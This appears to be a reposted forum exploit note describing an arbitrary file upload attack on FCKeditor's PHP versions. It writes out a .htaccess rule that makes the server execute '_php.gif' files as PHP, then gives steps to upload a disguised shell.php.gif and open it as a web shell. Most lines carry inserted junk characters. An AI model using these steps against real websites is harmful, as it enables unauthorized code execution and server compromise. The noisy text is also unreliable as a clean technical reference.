FCKeditor所有php版本Upload上传漏洞# c" R! e$ h! z& m' J
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07/ g t1 h& z- z
减小字体 增大字体' F7 F" h1 F" E7 Y% _
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
2 H8 y( \5 ?0 R! d[+] Date: 2011
& d! y$ V; ?) m[+] Author : sinesafe.cn9 c0 y1 E4 R3 {
[+] Website : WwW.sinesafe.cn
/ K; [5 y6 W9 x3 U- ^———————————————————
7 v+ |; Q7 ^7 `# J# X1.create a htaccess file:
+ d7 b- r" X! p/ U! D9 xcode:
( k! [9 ]* l4 C$ I, j<FilesMatch “_php.gif”>4 w$ S5 H2 H$ h- a Y3 x
SetHandler application/x-httpd-php% m3 A( u1 \3 q" A" G
</FilesMatch>
1 H9 t9 d8 P0 @
% k; @% y/ M2 R2.Now upload this htaccess with FCKeditor. F# S3 a& N3 F- t* ^7 Q# q
' i4 x- v* h" v8 C1 L5 fhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
& Q& P4 |/ Y" R8 F+ p) s4 ^; V
: [3 J: T: a t ^1 B7 _" e, [http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
$ b; }% y1 l5 T) U7 m1 k1 y' n! v* T4 X2 D+ m, |9 F @% V# h0 w
———————————————————————————————-# N4 y1 l# O8 B8 \
3.Now upload shell.php.gif with FCKeditor.
' v. g7 G' g" l" J) ?" F# P4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
9 Q# P( ` [% H( Z- E" p5.http://www.sinesafe.cn/anything/shell_php.gif2 I% N. I2 g. r7 L* ?! g: ~' J) Z% P
6.Now shell is available from server. |
0 \9 _- Z" Z) T/ W# U' Z7 O2 [1 L9 i
; {+ w" T$ T+ T* e% D5 J3 |. |9 |
|
发表于 2013-10-27 17:25:21
收藏
支持
反对